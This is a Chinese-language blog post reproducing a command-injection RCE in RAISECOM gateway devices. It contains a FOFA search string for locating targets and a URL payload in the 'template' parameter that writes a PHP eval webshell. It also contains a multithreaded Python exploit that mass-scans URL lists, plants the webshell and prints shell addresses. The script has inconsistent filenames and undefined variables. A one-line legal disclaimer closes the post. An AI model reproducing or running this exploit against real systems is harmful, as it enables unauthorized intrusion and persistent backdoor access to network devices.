RAISECOM网关设备list_base_config.php-RCE漏洞复现

产品界面图

fofa:body="/images/raisecom/back.gif"

template参数存在注入点,有的目标无法执行id,whoami等命令

 只能执行pwd,执行完写入到文件里面进行访问

 

 所以写入一句话木马连接方便操作

/vpn/list_base_config.php?type=mod&parts=base_config&template=`echo+-e+'<?php+eval($_POST['dd']);?>'>/www/tmp/dd.php`

 shell地址:http://ip/tmp/shell.php

EXP如下:

import requests
import argparse
import urllib3
import warnings
import threading
import time


# 忽略目标计算机积极关闭的问题
requests.packages.urllib3.disable_warnings()

# 忽略SSL证书验证的问题
warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning)

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0',
    'Cache-Control': 'max-age=0',
    'Sec-Ch-Ua': '"Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.9',
}

paylaod = "/vpn/list_base_config.php?type=mod&parts=base_config&template=`echo+-e+'<?php+eval($_POST['xxxx']);?>'>/www/tmp/dd323xx.php`"

def scan(url):
    url = url.rstrip("/")
    url_scan = url + paylaod
    try:
        re = requests.get(url_scan, headers=headers, verify=False, timeout=1)
        if re.status_code == 200:
            file_url = url + "/tmp/dd323.php"
            file_url_re = requests.get(file_url,headers=headers, verify=False, timeout=1)
            if file_url_re.status_code == 200:
                print("\033[32m[+]" + "漏洞存在,请访问" + file_url + "webshell连接密码为xxxx" + "\033[0m")

    except Exception as e:
        print("漏洞不存在或请求失败")


def file_scan(url):
    url = url.rstrip("/")
    url_scan = url + paylaod
    try:
        re = requests.get(url_scan, headers=headers, verify=False, timeout=1)
        if re.status_code == 200:
            file_url = url + "/tmp/dd323xx.php"
            file_url_re = requests.get(file_url, headers=headers, verify=False, timeout=1)
            if file_url_re.status_code == 200:
                result = "\033[32m[+]" + file_url + " webshell连接密码为xxxx" + "\033[0m"

        if result not in raisecom_urls:
            raisecom_sacn_urls.add(result)
            print(result)

    except Exception as e:
        print("\033[31m[-]" + url + "\033[0m")

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="2024.08.01")
    parser.add_argument('-u', '--url'.strip(), help='eg: -u http://www.xx.com')
    parser.add_argument('-f', '--file'.strip(), help='eg: -f urls.txt')
    args = parser.parse_args()
    if (args.url):
        scan(args.url)

    elif (args.file):
        with open(args.file,'r')as f:
            raisecom_urls = [line.strip() for line in f if line.strip()]
            raisecom_sacn_urls = set()

        threads = []
        for raisecom_url in raisecom_urls:
            thread = threading.Thread(target=file_scan, args=(raisecom_url,))
            thread.start()
            threads.append(thread)

        for thread in threads:
            thread.join()

    else:
        print(parser.format_help())

 声明:利用脚本仅供学习参考,请遵守相关法律法规,切勿非法渗透

posted @ 2024-08-01 01:52  Fengzun  阅读(511)  评论(0)    收藏  举报